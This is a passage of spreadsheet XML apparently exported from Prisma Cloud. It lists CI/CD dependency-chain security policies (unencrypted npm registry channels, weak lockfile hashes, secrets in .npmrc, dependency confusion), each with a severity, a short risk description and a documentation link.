https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/glpipeline-packages-insecurely-installed-npminstall</t>
        </is>
      </c>
      <c r="Y190" t="inlineStr"/>
      <c r="Z190" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA190" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB190" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC190" t="inlineStr"/>
      <c r="AD190" t="b">
        <v>1</v>
      </c>
      <c r="AE190" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF190" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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0" t="inlineStr">
        <is>
          <t>d4256605-38b2-47c2-9647-c05705e12b26</t>
        </is>
      </c>
      <c r="AI190" t="inlineStr"/>
      <c r="AJ190" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK190" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" t="inlineStr"/>
      <c r="B191" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C191" s="2" t="inlineStr"/>
      <c r="D191" t="inlineStr"/>
      <c r="E191" t="inlineStr"/>
      <c r="F191" t="inlineStr"/>
      <c r="G191" t="b">
        <v>1</v>
      </c>
      <c r="H1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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J191" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K191" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of a GitHub repository to download dependencies from registry</t>
        </is>
      </c>
      <c r="L191" t="inlineStr"/>
      <c r="M191" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N191" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O191" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P191" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q191" t="inlineStr"/>
      <c r="R191" t="inlineStr"/>
      <c r="S191" t="inlineStr"/>
      <c r="T191" t="b">
        <v>0</v>
      </c>
      <c r="U191" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V191" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W191" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages from a registry can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X191" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-unencrypted-channel-download-dependencies-registry</t>
        </is>
      </c>
      <c r="Y191" t="inlineStr"/>
      <c r="Z191" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA191" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB191" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC191" t="inlineStr"/>
      <c r="AD191" t="b">
        <v>1</v>
      </c>
      <c r="AE191" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF191" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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1" t="inlineStr">
        <is>
          <t>a02d81a8-a062-40ff-8489-9af938c8d4f4</t>
        </is>
      </c>
      <c r="AI191" t="inlineStr"/>
      <c r="AJ191" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK191" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" t="inlineStr"/>
      <c r="B192" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C192" s="2" t="inlineStr"/>
      <c r="D192" t="inlineStr"/>
      <c r="E192" t="inlineStr"/>
      <c r="F192" t="inlineStr"/>
      <c r="G192" t="b">
        <v>1</v>
      </c>
      <c r="H1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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J192" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K192" t="inlineStr">
        <is>
          <t>NPM package lock file verifies integrity with weak hash algorithm (Gitlab)</t>
        </is>
      </c>
      <c r="L192" t="inlineStr"/>
      <c r="M192" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N192" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O192" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P192" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q192" t="inlineStr"/>
      <c r="R192" t="inlineStr"/>
      <c r="S192" t="inlineStr"/>
      <c r="T192" t="b">
        <v>0</v>
      </c>
      <c r="U192" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V192" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W192" t="inlineStr">
        <is>
          <t>Old versions of package-lock.json files using SHA-1 to verify the integrity of downloaded dependencies are vulnerable to collision attacks in which two inputs can produce the same output, meaning that attackers can create a malicious package with the same hash of a legitimate package, bypassing the integrity validation. An attacker who has gained access to a maintainer account could trick a pipeline that uses \"npm ci\" to securely install a package and verify the dependencies integrity by replacing a legitimate package with a malicious version that has the same hash, thereby introducing malicious code which could potentially reach production. Note: Due to SHA-1 vulnerabilities, it was deprecated by NIST in 2011.</t>
        </is>
      </c>
      <c r="X192" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-npm-package-lockfile-weak-hash</t>
        </is>
      </c>
      <c r="Y192" t="inlineStr"/>
      <c r="Z192" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA192" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB192" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC192" t="inlineStr"/>
      <c r="AD192" t="b">
        <v>1</v>
      </c>
      <c r="AE192" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF192" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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2" t="inlineStr">
        <is>
          <t>8712159f-70bd-4794-804d-71793b91cbab</t>
        </is>
      </c>
      <c r="AI192" t="inlineStr"/>
      <c r="AJ192" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK192" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" t="inlineStr"/>
      <c r="B193" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C193" s="2" t="inlineStr"/>
      <c r="D193" t="inlineStr"/>
      <c r="E193" t="inlineStr"/>
      <c r="F193" t="inlineStr"/>
      <c r="G193" t="b">
        <v>1</v>
      </c>
      <c r="H1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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J193" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K193" t="inlineStr">
        <is>
          <t>Unencrypted channel used in BitBucket repository to download dependencies from NPM registry</t>
        </is>
      </c>
      <c r="L193" t="inlineStr"/>
      <c r="M193" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N193" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O193" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P193" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q193" t="inlineStr"/>
      <c r="R193" t="inlineStr"/>
      <c r="S193" t="inlineStr"/>
      <c r="T193" t="b">
        <v>0</v>
      </c>
      <c r="U193" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V193" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W193" t="inlineStr">
        <is>
          <t>Downloading packages using HTTP instead of HTTPS can make them vulnerable to man-in-the-middle attacks, which could potentially allow malicious code to be injected into the packages and executed on the CI or developer's endpoints. This could also expose internal packages to tampering. The dependency`s download URL can be found in the package-lock.json file.</t>
        </is>
      </c>
      <c r="X193" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-unencryotedchannel-download-dependencies</t>
        </is>
      </c>
      <c r="Y193" t="inlineStr"/>
      <c r="Z193" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA193" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB193" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC193" t="inlineStr"/>
      <c r="AD193" t="b">
        <v>1</v>
      </c>
      <c r="AE193" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF193" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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3" t="inlineStr">
        <is>
          <t>ff07314c-71ab-4d0c-9b4c-7e67393ed872</t>
        </is>
      </c>
      <c r="AI193" t="inlineStr"/>
      <c r="AJ193" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK193" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" t="inlineStr"/>
      <c r="B194" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C194" s="2" t="inlineStr"/>
      <c r="D194" t="inlineStr"/>
      <c r="E194" t="inlineStr"/>
      <c r="F194" t="inlineStr"/>
      <c r="G194" t="b">
        <v>1</v>
      </c>
      <c r="H1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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J194" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K194" t="inlineStr">
        <is>
          <t>Unencrypted channel used by '.npmrc' file of a bitbucket repository to download dependencies from registry</t>
        </is>
      </c>
      <c r="L194" t="inlineStr"/>
      <c r="M194" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N194" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O194" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P194" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q194" t="inlineStr"/>
      <c r="R194" t="inlineStr"/>
      <c r="S194" t="inlineStr"/>
      <c r="T194" t="b">
        <v>0</v>
      </c>
      <c r="U194" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V194" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W194" t="inlineStr">
        <is>
          <t>Using HTTP instead of HTTPS to download packages from a registry can make them vulnerable to man-in-the-middle attacks. These attacks could potentially inject malicious code into the packages, which may then be executed on the CI or developer's endpoints. This also poses a risk of exposing internal packages to tampering.</t>
        </is>
      </c>
      <c r="X194" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-unencrypted-channel-download-dependencies-registry</t>
        </is>
      </c>
      <c r="Y194" t="inlineStr"/>
      <c r="Z194" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA194" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB194" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC194" t="inlineStr"/>
      <c r="AD194" t="b">
        <v>1</v>
      </c>
      <c r="AE194" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF194" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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4" t="inlineStr">
        <is>
          <t>ad54cc0c-c0cb-4868-bceb-feb667873e7a</t>
        </is>
      </c>
      <c r="AI194" t="inlineStr"/>
      <c r="AJ194" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK194" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" t="inlineStr"/>
      <c r="B195" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C195" s="2" t="inlineStr"/>
      <c r="D195" t="inlineStr"/>
      <c r="E195" t="inlineStr"/>
      <c r="F195" t="inlineStr"/>
      <c r="G195" t="b">
        <v>1</v>
      </c>
      <c r="H1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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J195" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K195" t="inlineStr">
        <is>
          <t>Unencrypted channel used in GitHub repository to download dependencies from NPM registry</t>
        </is>
      </c>
      <c r="L195" t="inlineStr"/>
      <c r="M195" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N195" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O195" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P195" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q195" t="inlineStr"/>
      <c r="R195" t="inlineStr"/>
      <c r="S195" t="inlineStr"/>
      <c r="T195" t="b">
        <v>0</v>
      </c>
      <c r="U195" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V195" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W195" t="inlineStr">
        <is>
          <t>Downloading packages using HTTP instead of HTTPS can make them vulnerable to man-in-the-middle attacks, which could potentially allow malicious code to be injected into the packages and executed on the CI or developer's endpoints. This could also expose internal packages to tampering. The dependency`s download URL can be found in the package-lock.json file.</t>
        </is>
      </c>
      <c r="X195" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-unencrypt-channel-download-npm</t>
        </is>
      </c>
      <c r="Y195" t="inlineStr"/>
      <c r="Z195" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA195" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB195" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC195" t="inlineStr"/>
      <c r="AD195" t="b">
        <v>1</v>
      </c>
      <c r="AE195" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF195" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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5" t="inlineStr">
        <is>
          <t>effea3a5-2720-43eb-af4f-0f4887713a5d</t>
        </is>
      </c>
      <c r="AI195" t="inlineStr"/>
      <c r="AJ195" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK195" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" t="inlineStr"/>
      <c r="B196" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C196" s="2" t="inlineStr"/>
      <c r="D196" t="inlineStr"/>
      <c r="E196" t="inlineStr"/>
      <c r="F196" t="inlineStr"/>
      <c r="G196" t="b">
        <v>1</v>
      </c>
      <c r="H1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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J196" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K196" t="inlineStr">
        <is>
          <t>Secret exposed in registry URL within '.npmrc' file of a GitLab repository</t>
        </is>
      </c>
      <c r="L196" t="inlineStr"/>
      <c r="M196" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N196" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O196" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P196" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q196" t="inlineStr"/>
      <c r="R196" t="inlineStr"/>
      <c r="S196" t="inlineStr"/>
      <c r="T196" t="b">
        <v>0</v>
      </c>
      <c r="U196" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V196" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W196" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious packages to a registry which could reach the production environment or accessing internal packages on the registry.</t>
        </is>
      </c>
      <c r="X196" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-secrets-exposed-registryurl-npmrc</t>
        </is>
      </c>
      <c r="Y196" t="inlineStr"/>
      <c r="Z196" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA196" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB196" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC196" t="inlineStr"/>
      <c r="AD196" t="b">
        <v>1</v>
      </c>
      <c r="AE196" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF196" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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6" t="inlineStr">
        <is>
          <t>35f2b348-215a-45fe-b395-4a27c96d2ec5</t>
        </is>
      </c>
      <c r="AI196" t="inlineStr"/>
      <c r="AJ196" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK196" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" t="inlineStr"/>
      <c r="B197" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C197" s="2" t="inlineStr"/>
      <c r="D197" t="inlineStr"/>
      <c r="E197" t="inlineStr"/>
      <c r="F197" t="inlineStr"/>
      <c r="G197" t="b">
        <v>1</v>
      </c>
      <c r="H1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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J197" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K197" t="inlineStr">
        <is>
          <t>Unencrypted channel used in GitLab repository to download dependencies from NPM registry</t>
        </is>
      </c>
      <c r="L197" t="inlineStr"/>
      <c r="M197" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N197" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O197" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P197" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q197" t="inlineStr"/>
      <c r="R197" t="inlineStr"/>
      <c r="S197" t="inlineStr"/>
      <c r="T197" t="b">
        <v>0</v>
      </c>
      <c r="U197" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V197" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W197" t="inlineStr">
        <is>
          <t>Downloading packages using HTTP instead of HTTPS can make them vulnerable to man-in-the-middle attacks, which could potentially allow malicious code to be injected into the packages and executed on the CI or developer's endpoints. This could also expose internal packages to tampering. The dependency`s download URL can be found in the package-lock.json file.</t>
        </is>
      </c>
      <c r="X197" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-unencryotedchannel-download-dependencies</t>
        </is>
      </c>
      <c r="Y197" t="inlineStr"/>
      <c r="Z197" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA197" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB197" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC197" t="inlineStr"/>
      <c r="AD197" t="b">
        <v>1</v>
      </c>
      <c r="AE197" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF197" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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7" t="inlineStr">
        <is>
          <t>75b05765-9ce3-4a76-b20a-8be72457fd4f</t>
        </is>
      </c>
      <c r="AI197" t="inlineStr"/>
      <c r="AJ197" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK197" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" t="inlineStr"/>
      <c r="B198" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C198" s="2" t="inlineStr"/>
      <c r="D198" t="inlineStr"/>
      <c r="E198" t="inlineStr"/>
      <c r="F198" t="inlineStr"/>
      <c r="G198" t="b">
        <v>1</v>
      </c>
      <c r="H1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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J198" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K198" t="inlineStr">
        <is>
          <t>Packages insecurely installed through “npm install” command in Azure Pipelines pipeline</t>
        </is>
      </c>
      <c r="L198" t="inlineStr"/>
      <c r="M198" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N198" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O198" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P198" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q198" t="inlineStr"/>
      <c r="R198" t="inlineStr"/>
      <c r="S198" t="inlineStr"/>
      <c r="T198" t="b">
        <v>0</v>
      </c>
      <c r="U198" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V198" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W198" t="inlineStr">
        <is>
          <t>In common package.json configurations, the "npm install" command updates and installs package versions. "npm install" doesn't check for package integrity, allowing attackers who have gained control of a dependency package to upload a malicious version, which is then downloaded and installed automatically when running "npm install".</t>
        </is>
      </c>
      <c r="X198" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repos-pckg-insecure-npm-install</t>
        </is>
      </c>
      <c r="Y198" t="inlineStr"/>
      <c r="Z198" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA198" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB198" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC198" t="inlineStr"/>
      <c r="AD198" t="b">
        <v>1</v>
      </c>
      <c r="AE198" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF198" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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8" t="inlineStr">
        <is>
          <t>6c2a6198-50e4-43df-98d8-2b237e80122b</t>
        </is>
      </c>
      <c r="AI198" t="inlineStr"/>
      <c r="AJ198" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK198" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" t="inlineStr"/>
      <c r="B199" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C199" s="2" t="inlineStr"/>
      <c r="D199" t="inlineStr"/>
      <c r="E199" t="inlineStr"/>
      <c r="F199" t="inlineStr"/>
      <c r="G199" t="b">
        <v>1</v>
      </c>
      <c r="H1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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J199" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K199" t="inlineStr">
        <is>
          <t>Potential dependency confusion in an Azure repository due to package name or scope available in registry</t>
        </is>
      </c>
      <c r="L199" t="inlineStr"/>
      <c r="M199" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N199" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O199" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P199" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q199" t="inlineStr"/>
      <c r="R199" t="inlineStr"/>
      <c r="S199" t="inlineStr"/>
      <c r="T199" t="b">
        <v>0</v>
      </c>
      <c r="U199" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V199" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W199" t="inlineStr">
        <is>
          <t>Attackers can discover internal package names by scanning public repositories and artifacts. Then they can upload malicious packages with names identical to an organization's internal package names and scopes, hoping that improper package fetching configuration will cause internal clients to fetch the malicious package rather than the legitimate internal package with the same name. This is known as a Dependency Confusion attack.</t>
        </is>
      </c>
      <c r="X199" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-dependency-confusion</t>
        </is>
      </c>
      <c r="Y199" t="inlineStr"/>
      <c r="Z199" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA199" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB199" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC199" t="inlineStr"/>
      <c r="AD199" t="b">
        <v>1</v>
      </c>
      <c r="AE199" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF199" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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9" t="inlineStr">
        <is>
          <t>22e5f26e-9389-48a3-a0dc-d04b194614ce</t>
        </is>
      </c>
      <c r="AI199" t="inlineStr"/>
      <c r="AJ199" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK199" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" t="inlineStr"/>
      <c r="B200" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C200" s="2" t="inlineStr"/>
      <c r="D200" t="inlineStr"/>
      <c r="E200" t="inlineStr"/>
      <c r="F200" t="inlineStr"/>
      <c r="G200" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J200" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K200" t="inlineStr">
        <is>
          <t>Azure repository missing NPM lock file</t>
        </is>
      </c>
      <c r="L200" t="inlineStr"/>
      <c r="M200" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N200" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O200" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P200" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q200" t="inlineStr"/>
      <c r="R200" t="inlineStr"/>
      <c r="S200" t="inlineStr"/>
      <c r="T200" t="b">
        <v>0</v>
      </c>
